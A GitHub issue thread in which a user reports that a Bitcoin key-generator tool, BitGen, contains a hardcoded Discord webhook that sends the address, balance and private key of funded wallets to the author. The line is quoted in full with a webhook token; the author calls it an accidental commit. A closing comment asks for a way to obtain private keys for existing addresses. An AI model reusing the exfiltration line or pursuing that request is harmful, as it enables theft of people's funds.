### ISSUE TITLE
scam 

### ISSUE THREAD

**Issue by ctyzan** [Anarbb/BitGen#11]
scammed
`webhook = DiscordWebhook(url='https://discord.com/api/webhooks/914476019086426145/OdSndxmXSr7CH3v4uPAgml_vYWDL5EXeCkb_5xpzp2KZP7CPtgV7ifFm9XyNJBpUCgvF', rate_limit_retry=True, content=f'@everyone Address: {addr} | Balance: {balance} | Private key: {prv}')`

**Comment by olkah** [comment]
Why do you think so  ???

**Comment by ctyzan** [comment]
script sending to author private key of addr where balance != 0

**Comment by qwfpg** [comment]
@ctyzan only if specified it in arguments I guess

**Comment by ctyzan** [comment]
> @ctyzan only if you specified it in arguments I guess
nope. do you see some variables in this line? this is static line in code and this is author's token.

**Comment by qwfpg** [comment]
Now I see next lines:
`                    if args.discord:
                        webhook = DiscordWebhook(url=args.discord, rate_limit_retry=True, content=f'@everyone Address: {addr} | Balance: {balance} | Private key: {prv}')
                        response = webhook.execute()`

**Comment by qwfpg** [comment]
@ctyzan Now I see next lines:
`if args.discord: webhook = DiscordWebhook(url=args.discord, rate_limit_retry=True, content=f'@everyone Address: {addr} | Balance: {balance} | Private key: {prv}') response = webhook.execute()`

**Comment by ctyzan** [comment]
@qwfpg okay it was commited 7hrs ago
i have no any questions. may be it was misstake

**Comment by Anarbb** [comment]
It was a mistake I accidentally committed the code while implementing discord notifications

**Comment by olkah** [comment]
It will be very good if the developers add a function so that it is possible to parse private keys to existing btc addresses or so that private keys are generated to existing btc addresses with their mandatory verification
